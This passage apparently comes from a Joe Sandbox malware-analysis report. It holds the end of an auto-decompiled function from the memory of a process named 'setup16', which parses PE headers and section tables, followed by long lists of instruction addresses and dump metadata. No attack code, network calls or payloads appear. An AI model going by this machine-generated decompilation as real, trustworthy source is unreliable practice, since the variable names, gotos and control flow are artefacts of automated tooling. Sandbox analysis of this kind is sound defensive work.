																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E049DE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L049D8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04A03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                                                                                                                                        0x049dd5f2
                                                                                                                                                                                                        0x049dd5f5
                                                                                                                                                                                                        0x049dd5f5
                                                                                                                                                                                                        0x049dd5fd
                                                                                                                                                                                                        0x049dd600
                                                                                                                                                                                                        0x049dd60a
                                                                                                                                                                                                        0x049dd60d
                                                                                                                                                                                                        0x049dd617
                                                                                                                                                                                                        0x049dd61d
                                                                                                                                                                                                        0x049dd627
                                                                                                                                                                                                        0x049dd62e
                                                                                                                                                                                                        0x049dd911
                                                                                                                                                                                                        0x049dd913
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd919
                                                                                                                                                                                                        0x049dd919
                                                                                                                                                                                                        0x049dd919
                                                                                                                                                                                                        0x049dd634
                                                                                                                                                                                                        0x049dd634
                                                                                                                                                                                                        0x049dd634
                                                                                                                                                                                                        0x049dd634
                                                                                                                                                                                                        0x049dd640
                                                                                                                                                                                                        0x049dd8bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd646
                                                                                                                                                                                                        0x049dd646
                                                                                                                                                                                                        0x049dd64d
                                                                                                                                                                                                        0x049dd652
                                                                                                                                                                                                        0x04a2b2fc
                                                                                                                                                                                                        0x04a2b2fc
                                                                                                                                                                                                        0x04a2b302
                                                                                                                                                                                                        0x04a2b33b
                                                                                                                                                                                                        0x04a2b341
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b304
                                                                                                                                                                                                        0x04a2b304
                                                                                                                                                                                                        0x04a2b319
                                                                                                                                                                                                        0x04a2b31e
                                                                                                                                                                                                        0x04a2b324
                                                                                                                                                                                                        0x04a2b326
                                                                                                                                                                                                        0x04a2b332
                                                                                                                                                                                                        0x04a2b347
                                                                                                                                                                                                        0x04a2b34c
                                                                                                                                                                                                        0x04a2b351
                                                                                                                                                                                                        0x04a2b35a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b328
                                                                                                                                                                                                        0x04a2b328
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b328
                                                                                                                                                                                                        0x04a2b326
                                                                                                                                                                                                        0x049dd658
                                                                                                                                                                                                        0x049dd658
                                                                                                                                                                                                        0x049dd65b
                                                                                                                                                                                                        0x049dd665
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd66b
                                                                                                                                                                                                        0x049dd66b
                                                                                                                                                                                                        0x049dd66b
                                                                                                                                                                                                        0x049dd66b
                                                                                                                                                                                                        0x049dd66d
                                                                                                                                                                                                        0x049dd672
                                                                                                                                                                                                        0x049dd67a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd680
                                                                                                                                                                                                        0x049dd686
                                                                                                                                                                                                        0x049dd8ce
                                                                                                                                                                                                        0x049dd8d4
                                                                                                                                                                                                        0x049dd8dd
                                                                                                                                                                                                        0x049dd8e0
                                                                                                                                                                                                        0x049dd68c
                                                                                                                                                                                                        0x049dd691
                                                                                                                                                                                                        0x049dd69d
                                                                                                                                                                                                        0x049dd6a2
                                                                                                                                                                                                        0x049dd6a7
                                                                                                                                                                                                        0x049dd6b0
                                                                                                                                                                                                        0x049dd6b5
                                                                                                                                                                                                        0x049dd6e0
                                                                                                                                                                                                        0x049dd6b7
                                                                                                                                                                                                        0x049dd6b7
                                                                                                                                                                                                        0x049dd6b9
                                                                                                                                                                                                        0x049dd6b9
                                                                                                                                                                                                        0x049dd6bb
                                                                                                                                                                                                        0x049dd6bd
                                                                                                                                                                                                        0x049dd6ce
                                                                                                                                                                                                        0x049dd6d0
                                                                                                                                                                                                        0x049dd6d2
                                                                                                                                                                                                        0x04a2b363
                                                                                                                                                                                                        0x04a2b365
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b36b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b36b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd6bf
                                                                                                                                                                                                        0x049dd6bf
                                                                                                                                                                                                        0x049dd6e5
                                                                                                                                                                                                        0x049dd6e7
                                                                                                                                                                                                        0x049dd6e9
                                                                                                                                                                                                        0x049dd6ec
                                                                                                                                                                                                        0x049dd6ec
                                                                                                                                                                                                        0x049dd6ef
                                                                                                                                                                                                        0x049dd6f5
                                                                                                                                                                                                        0x049dd6f9
                                                                                                                                                                                                        0x049dd6fb
                                                                                                                                                                                                        0x049dd6fd
                                                                                                                                                                                                        0x049dd701
                                                                                                                                                                                                        0x049dd703
                                                                                                                                                                                                        0x049dd70a
                                                                                                                                                                                                        0x049dd70a
                                                                                                                                                                                                        0x049dd701
                                                                                                                                                                                                        0x049dd710
                                                                                                                                                                                                        0x049dd710
                                                                                                                                                                                                        0x049dd6c1
                                                                                                                                                                                                        0x049dd6c1
                                                                                                                                                                                                        0x049dd6c6
                                                                                                                                                                                                        0x04a2b36d
                                                                                                                                                                                                        0x04a2b36f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b375
                                                                                                                                                                                                        0x04a2b375
                                                                                                                                                                                                        0x04a2b375
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b375
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd6cc
                                                                                                                                                                                                        0x049dd6d8
                                                                                                                                                                                                        0x049dd6d8
                                                                                                                                                                                                        0x049dd6d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd6c6
                                                                                                                                                                                                        0x049dd6bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd6da
                                                                                                                                                                                                        0x049dd6da
                                                                                                                                                                                                        0x049dd716
                                                                                                                                                                                                        0x049dd71b
                                                                                                                                                                                                        0x049dd720
                                                                                                                                                                                                        0x049dd726
                                                                                                                                                                                                        0x049dd726
                                                                                                                                                                                                        0x049dd72d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd733
                                                                                                                                                                                                        0x049dd739
                                                                                                                                                                                                        0x049dd742
                                                                                                                                                                                                        0x049dd750
                                                                                                                                                                                                        0x049dd758
                                                                                                                                                                                                        0x049dd764
                                                                                                                                                                                                        0x049dd776
                                                                                                                                                                                                        0x049dd77a
                                                                                                                                                                                                        0x049dd783
                                                                                                                                                                                                        0x049dd928
                                                                                                                                                                                                        0x049dd92c
                                                                                                                                                                                                        0x049dd93d
                                                                                                                                                                                                        0x049dd944
                                                                                                                                                                                                        0x049dd94f
                                                                                                                                                                                                        0x049dd954
                                                                                                                                                                                                        0x049dd956
                                                                                                                                                                                                        0x049dd95f
                                                                                                                                                                                                        0x049dd961
                                                                                                                                                                                                        0x049dd973
                                                                                                                                                                                                        0x049dd973
                                                                                                                                                                                                        0x049dd956
                                                                                                                                                                                                        0x049dd944
                                                                                                                                                                                                        0x049dd92c
                                                                                                                                                                                                        0x049dd78b
                                                                                                                                                                                                        0x04a2b394
                                                                                                                                                                                                        0x049dd791
                                                                                                                                                                                                        0x049dd798
                                                                                                                                                                                                        0x04a2b3a3
                                                                                                                                                                                                        0x04a2b3bb
                                                                                                                                                                                                        0x04a2b3bb
                                                                                                                                                                                                        0x049dd7a5
                                                                                                                                                                                                        0x049dd866
                                                                                                                                                                                                        0x049dd870
                                                                                                                                                                                                        0x049dd892
                                                                                                                                                                                                        0x049dd898
                                                                                                                                                                                                        0x049dd89e
                                                                                                                                                                                                        0x049dd8a0
                                                                                                                                                                                                        0x049dd8a6
                                                                                                                                                                                                        0x049dd8ac
                                                                                                                                                                                                        0x049dd8ae
                                                                                                                                                                                                        0x049dd8b4
                                                                                                                                                                                                        0x049dd8b4
                                                                                                                                                                                                        0x049dd8ae
                                                                                                                                                                                                        0x049dd7a5
                                                                                                                                                                                                        0x049dd78b
                                                                                                                                                                                                        0x049dd7b1
                                                                                                                                                                                                        0x04a2b3c5
                                                                                                                                                                                                        0x04a2b3c5
                                                                                                                                                                                                        0x049dd7c3
                                                                                                                                                                                                        0x049dd7ca
                                                                                                                                                                                                        0x049dd7e5
                                                                                                                                                                                                        0x049dd7eb
                                                                                                                                                                                                        0x049dd8eb
                                                                                                                                                                                                        0x049dd8ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd8f3
                                                                                                                                                                                                        0x049dd8f3
                                                                                                                                                                                                        0x049dd8f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd8ed
                                                                                                                                                                                                        0x049dd7cc
                                                                                                                                                                                                        0x049dd7cc
                                                                                                                                                                                                        0x049dd7d2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd7d4
                                                                                                                                                                                                        0x049dd7d4
                                                                                                                                                                                                        0x049dd7d7
                                                                                                                                                                                                        0x049dd7df
                                                                                                                                                                                                        0x04a2b3d4
                                                                                                                                                                                                        0x04a2b3d9
                                                                                                                                                                                                        0x04a2b3dc
                                                                                                                                                                                                        0x04a2b3dc
                                                                                                                                                                                                        0x04a2b3df
                                                                                                                                                                                                        0x04a2b3e2
                                                                                                                                                                                                        0x04a2b468
                                                                                                                                                                                                        0x04a2b46d
                                                                                                                                                                                                        0x04a2b46f
                                                                                                                                                                                                        0x04a2b46f
                                                                                                                                                                                                        0x04a2b475
                                                                                                                                                                                                        0x049dd8f8
                                                                                                                                                                                                        0x049dd8f9
                                                                                                                                                                                                        0x049dd8fd
                                                                                                                                                                                                        0x04a2b3e8
                                                                                                                                                                                                        0x04a2b3e8
                                                                                                                                                                                                        0x04a2b3eb
                                                                                                                                                                                                        0x04a2b3ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b3ef
                                                                                                                                                                                                        0x04a2b3ef
                                                                                                                                                                                                        0x04a2b3f1
                                                                                                                                                                                                        0x04a2b3f4
                                                                                                                                                                                                        0x04a2b3fe
                                                                                                                                                                                                        0x04a2b404
                                                                                                                                                                                                        0x04a2b409
                                                                                                                                                                                                        0x04a2b40e
                                                                                                                                                                                                        0x04a2b410
                                                                                                                                                                                                        0x04a2b410
                                                                                                                                                                                                        0x04a2b414
                                                                                                                                                                                                        0x04a2b414
                                                                                                                                                                                                        0x04a2b41b
                                                                                                                                                                                                        0x04a2b420
                                                                                                                                                                                                        0x04a2b423
                                                                                                                                                                                                        0x04a2b425
                                                                                                                                                                                                        0x04a2b427
                                                                                                                                                                                                        0x04a2b42a
                                                                                                                                                                                                        0x04a2b42d
                                                                                                                                                                                                        0x04a2b42d
                                                                                                                                                                                                        0x04a2b42a
                                                                                                                                                                                                        0x04a2b432
                                                                                                                                                                                                        0x04a2b436
                                                                                                                                                                                                        0x04a2b438
                                                                                                                                                                                                        0x04a2b43b
                                                                                                                                                                                                        0x04a2b43b
                                                                                                                                                                                                        0x04a2b449
                                                                                                                                                                                                        0x04a2b44e
                                                                                                                                                                                                        0x04a2b454
                                                                                                                                                                                                        0x04a2b458
                                                                                                                                                                                                        0x04a2b458
                                                                                                                                                                                                        0x04a2b45d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b45d
                                                                                                                                                                                                        0x04a2b3ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd7df
                                                                                                                                                                                                        0x049dd7d2
                                                                                                                                                                                                        0x049dd7ca
                                                                                                                                                                                                        0x04a2b37c
                                                                                                                                                                                                        0x04a2b37e
                                                                                                                                                                                                        0x04a2b385
                                                                                                                                                                                                        0x04a2b38a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b38a
                                                                                                                                                                                                        0x049dd742
                                                                                                                                                                                                        0x049dd7f1
                                                                                                                                                                                                        0x049dd7f8
                                                                                                                                                                                                        0x04a2b49b
                                                                                                                                                                                                        0x04a2b49b
                                                                                                                                                                                                        0x049dd800
                                                                                                                                                                                                        0x049dd837
                                                                                                                                                                                                        0x049dd843
                                                                                                                                                                                                        0x049dd845
                                                                                                                                                                                                        0x049dd847
                                                                                                                                                                                                        0x049dd84a
                                                                                                                                                                                                        0x049dd84b
                                                                                                                                                                                                        0x049dd84e
                                                                                                                                                                                                        0x049dd857
                                                                                                                                                                                                        0x049dd818
                                                                                                                                                                                                        0x049dd824
                                                                                                                                                                                                        0x049dd831
                                                                                                                                                                                                        0x04a2b4a5
                                                                                                                                                                                                        0x04a2b4ab
                                                                                                                                                                                                        0x04a2b4b3
                                                                                                                                                                                                        0x04a2b4b8
                                                                                                                                                                                                        0x04a2b4bb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b4c1
                                                                                                                                                                                                        0x04a2b4c1
                                                                                                                                                                                                        0x04a2b4c8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b4ce
                                                                                                                                                                                                        0x04a2b4d4
                                                                                                                                                                                                        0x04a2b4e1
                                                                                                                                                                                                        0x04a2b4e3
                                                                                                                                                                                                        0x04a2b4e5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b4eb
                                                                                                                                                                                                        0x04a2b4f0
                                                                                                                                                                                                        0x04a2b4f2
                                                                                                                                                                                                        0x049ddac9
                                                                                                                                                                                                        0x049ddacc
                                                                                                                                                                                                        0x049ddacf
                                                                                                                                                                                                        0x049ddad1
                                                                                                                                                                                                        0x049ddd78
                                                                                                                                                                                                        0x049ddd78
                                                                                                                                                                                                        0x049ddcf2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddad7
                                                                                                                                                                                                        0x049ddad9
                                                                                                                                                                                                        0x049ddadb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddae1
                                                                                                                                                                                                        0x049ddae1
                                                                                                                                                                                                        0x049ddae4
                                                                                                                                                                                                        0x049ddae6
                                                                                                                                                                                                        0x04a2b4f9
                                                                                                                                                                                                        0x04a2b4f9
                                                                                                                                                                                                        0x04a2b500
                                                                                                                                                                                                        0x049ddaec
                                                                                                                                                                                                        0x049ddaec
                                                                                                                                                                                                        0x049ddaf5
                                                                                                                                                                                                        0x049ddaf8
                                                                                                                                                                                                        0x049ddafb
                                                                                                                                                                                                        0x049ddb03
                                                                                                                                                                                                        0x049ddb11
                                                                                                                                                                                                        0x049ddb16
                                                                                                                                                                                                        0x049ddb19
                                                                                                                                                                                                        0x049ddb1b
                                                                                                                                                                                                        0x04a2b52c
                                                                                                                                                                                                        0x04a2b531
                                                                                                                                                                                                        0x04a2b534
                                                                                                                                                                                                        0x049ddb21
                                                                                                                                                                                                        0x049ddb21
                                                                                                                                                                                                        0x049ddb24
                                                                                                                                                                                                        0x049ddcd9
                                                                                                                                                                                                        0x049ddce2
                                                                                                                                                                                                        0x049ddce5
                                                                                                                                                                                                        0x049ddd6a
                                                                                                                                                                                                        0x049ddd6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddd73
                                                                                                                                                                                                        0x04a2b51a
                                                                                                                                                                                                        0x04a2b51c
                                                                                                                                                                                                        0x04a2b51f
                                                                                                                                                                                                        0x04a2b524
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b524
                                                                                                                                                                                                        0x049ddce7
                                                                                                                                                                                                        0x049ddce7
                                                                                                                                                                                                        0x049ddce7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddce7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddb2a
                                                                                                                                                                                                        0x049ddb2c
                                                                                                                                                                                                        0x049ddb31
                                                                                                                                                                                                        0x049ddb33
                                                                                                                                                                                                        0x049ddb36
                                                                                                                                                                                                        0x049ddb39
                                                                                                                                                                                                        0x049ddb3b
                                                                                                                                                                                                        0x049ddb66
                                                                                                                                                                                                        0x049ddb66
                                                                                                                                                                                                        0x049ddb3d
                                                                                                                                                                                                        0x049ddb3d
                                                                                                                                                                                                        0x049ddb3e
                                                                                                                                                                                                        0x049ddb46
                                                                                                                                                                                                        0x049ddb47
                                                                                                                                                                                                        0x049ddb49
                                                                                                                                                                                                        0x049ddb4c
                                                                                                                                                                                                        0x049ddb53
                                                                                                                                                                                                        0x049ddb55
                                                                                                                                                                                                        0x049ddb58
                                                                                                                                                                                                        0x049ddb5a
                                                                                                                                                                                                        0x04a2b50a
                                                                                                                                                                                                        0x04a2b50f
                                                                                                                                                                                                        0x04a2b512
                                                                                                                                                                                                        0x049ddb60
                                                                                                                                                                                                        0x049ddb60
                                                                                                                                                                                                        0x049ddb63
                                                                                                                                                                                                        0x049ddb63
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddb63
                                                                                                                                                                                                        0x049ddb5a
                                                                                                                                                                                                        0x049ddb3b
                                                                                                                                                                                                        0x049ddb24
                                                                                                                                                                                                        0x049ddb69
                                                                                                                                                                                                        0x049ddb69
                                                                                                                                                                                                        0x049ddb6c
                                                                                                                                                                                                        0x049ddb6f
                                                                                                                                                                                                        0x049ddb74
                                                                                                                                                                                                        0x04a2b557
                                                                                                                                                                                                        0x04a2b557
                                                                                                                                                                                                        0x04a2b55e
                                                                                                                                                                                                        0x049ddb7a
                                                                                                                                                                                                        0x049ddb7c
                                                                                                                                                                                                        0x049ddb7f
                                                                                                                                                                                                        0x049ddb82
                                                                                                                                                                                                        0x049ddb85
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddb8b
                                                                                                                                                                                                        0x049ddb8b
                                                                                                                                                                                                        0x049ddb8d
                                                                                                                                                                                                        0x049ddb9b
                                                                                                                                                                                                        0x049ddb9b
                                                                                                                                                                                                        0x049ddb9d
                                                                                                                                                                                                        0x049ddba0
                                                                                                                                                                                                        0x049ddba2
                                                                                                                                                                                                        0x049ddba4
                                                                                                                                                                                                        0x049ddba7
                                                                                                                                                                                                        0x049ddba9
                                                                                                                                                                                                        0x049ddbae
                                                                                                                                                                                                        0x049ddbae
                                                                                                                                                                                                        0x049ddbb1
                                                                                                                                                                                                        0x049ddbb4
                                                                                                                                                                                                        0x049ddbb4
                                                                                                                                                                                                        0x049ddbb7
                                                                                                                                                                                                        0x049ddbba
                                                                                                                                                                                                        0x049ddcd2
                                                                                                                                                                                                        0x049ddcd4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddbc0
                                                                                                                                                                                                        0x049ddbc0
                                                                                                                                                                                                        0x049ddbd2
                                                                                                                                                                                                        0x049ddbd7
                                                                                                                                                                                                        0x049ddbda
                                                                                                                                                                                                        0x049ddbdd
                                                                                                                                                                                                        0x049ddbdf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddbe5
                                                                                                                                                                                                        0x049ddbe5
                                                                                                                                                                                                        0x049ddbee
                                                                                                                                                                                                        0x049ddbf1
                                                                                                                                                                                                        0x04a2b541
                                                                                                                                                                                                        0x04a2b544
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b546
                                                                                                                                                                                                        0x04a2b546
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b546
                                                                                                                                                                                                        0x049ddbf7
                                                                                                                                                                                                        0x049ddbf7
                                                                                                                                                                                                        0x049ddbfd
                                                                                                                                                                                                        0x049ddbfd
                                                                                                                                                                                                        0x049ddbff
                                                                                                                                                                                                        0x049ddc0b
                                                                                                                                                                                                        0x049ddc15
                                                                                                                                                                                                        0x049ddc1b
                                                                                                                                                                                                        0x049ddc1d
                                                                                                                                                                                                        0x049ddc21
                                                                                                                                                                                                        0x049ddc21
                                                                                                                                                                                                        0x049ddc23
                                                                                                                                                                                                        0x049ddc23
                                                                                                                                                                                                        0x049ddc26
                                                                                                                                                                                                        0x049ddc29
                                                                                                                                                                                                        0x049ddc2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc31
                                                                                                                                                                                                        0x049ddc34
                                                                                                                                                                                                        0x049ddc36
                                                                                                                                                                                                        0x049ddcbf
                                                                                                                                                                                                        0x049ddcbf
                                                                                                                                                                                                        0x049ddcc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc3c
                                                                                                                                                                                                        0x049ddc41
                                                                                                                                                                                                        0x049ddc43
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc45
                                                                                                                                                                                                        0x049ddc45
                                                                                                                                                                                                        0x049ddc47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc4d
                                                                                                                                                                                                        0x049ddc4d
                                                                                                                                                                                                        0x049ddc50
                                                                                                                                                                                                        0x049ddc52
                                                                                                                                                                                                        0x049ddc55
                                                                                                                                                                                                        0x049ddcfa
                                                                                                                                                                                                        0x049ddcfe
                                                                                                                                                                                                        0x049ddd08
                                                                                                                                                                                                        0x049ddd0a
                                                                                                                                                                                                        0x049ddd0c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddd12
                                                                                                                                                                                                        0x049ddd15
                                                                                                                                                                                                        0x049ddd2d
                                                                                                                                                                                                        0x049ddd2f
                                                                                                                                                                                                        0x049ddd32
                                                                                                                                                                                                        0x049ddd35
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddd35
                                                                                                                                                                                                        0x049ddc5b
                                                                                                                                                                                                        0x049ddc5b
                                                                                                                                                                                                        0x049ddc5e
                                                                                                                                                                                                        0x049ddc61
                                                                                                                                                                                                        0x049ddc64
                                                                                                                                                                                                        0x049ddc67
                                                                                                                                                                                                        0x049ddc67
                                                                                                                                                                                                        0x049ddc6a
                                                                                                                                                                                                        0x049ddc6c
                                                                                                                                                                                                        0x049ddc8e
                                                                                                                                                                                                        0x049ddc8e
                                                                                                                                                                                                        0x049ddc91
                                                                                                                                                                                                        0x049ddc93
                                                                                                                                                                                                        0x049ddcce
                                                                                                                                                                                                        0x049ddcce
                                                                                                                                                                                                        0x049ddc95
                                                                                                                                                                                                        0x049ddc9c
                                                                                                                                                                                                        0x049ddc6e
                                                                                                                                                                                                        0x049ddc72
                                                                                                                                                                                                        0x049ddc75
                                                                                                                                                                                                        0x049ddc77
                                                                                                                                                                                                        0x049ddc79
                                                                                                                                                                                                        0x04a2b551
                                                                                                                                                                                                        0x04a2b551
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc7f
                                                                                                                                                                                                        0x049ddc7f
                                                                                                                                                                                                        0x049ddc81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc83
                                                                                                                                                                                                        0x049ddc86
                                                                                                                                                                                                        0x049ddc88
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc88
                                                                                                                                                                                                        0x049ddc81
                                                                                                                                                                                                        0x049ddc79
                                                                                                                                                                                                        0x049ddc6c
                                                                                                                                                                                                        0x049ddc55
                                                                                                                                                                                                        0x049ddc47
                                                                                                                                                                                                        0x049ddc43
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddc36
                                                                                                                                                                                                        0x049ddc23
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddbff
                                                                                                                                                                                                        0x049ddbf1
                                                                                                                                                                                                        0x049ddbdf
                                                                                                                                                                                                        0x049ddb8f
                                                                                                                                                                                                        0x049ddb92
                                                                                                                                                                                                        0x049ddb95
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ddb95
                                                                                                                                                                                                        0x049ddb8d
                                                                                                                                                                                                        0x049ddb85
                                                                                                                                                                                                        0x049ddb74
                                                                                                                                                                                                        0x049ddc9f
                                                                                                                                                                                                        0x049ddca2
                                                                                                                                                                                                        0x049ddcb0
                                                                                                                                                                                                        0x049ddcb0
                                                                                                                                                                                                        0x049ddad1
                                                                                                                                                                                                        0x04a2b4e5
                                                                                                                                                                                                        0x04a2b4c8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd831
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dd800
                                                                                                                                                                                                        0x04a2b47f
                                                                                                                                                                                                        0x04a2b485
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2b485
                                                                                                                                                                                                        0x049dd665
                                                                                                                                                                                                        0x049dd652
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
